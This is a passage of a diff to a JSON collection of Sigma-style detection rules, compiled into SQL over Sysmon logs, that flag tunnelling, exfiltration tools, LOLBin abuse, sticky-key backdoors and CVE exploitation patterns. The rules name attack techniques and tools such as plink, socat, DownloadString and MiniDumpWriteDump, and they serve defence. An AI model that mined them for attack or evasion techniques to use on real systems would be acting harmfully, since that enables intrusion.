Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ "attack.lateral_movement", - "attack.t1021" + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", "status": "test", - "description": "Detects suspicious msiexec process starts with web addresses as parameter", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Winzip", + "Other self-extractors" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", + "id": "bab049ca-7471-4828-9024-38279a4c04da", "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "author": "Janantha Marasinghe", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE '\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE '%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_virtualbox_execution.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Exfiltration and Tunneling Tools Execution", + "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "title": "Proxy Execution Via Explorer.exe", + "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate explorer.exe run from cmd.exe" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_explorer_lolbin_execution.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", + "title": "Use of Wfc.exe", + "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "status": "experimental", - "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", - "author": "frack113, Nasreddine Bencherchali", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": 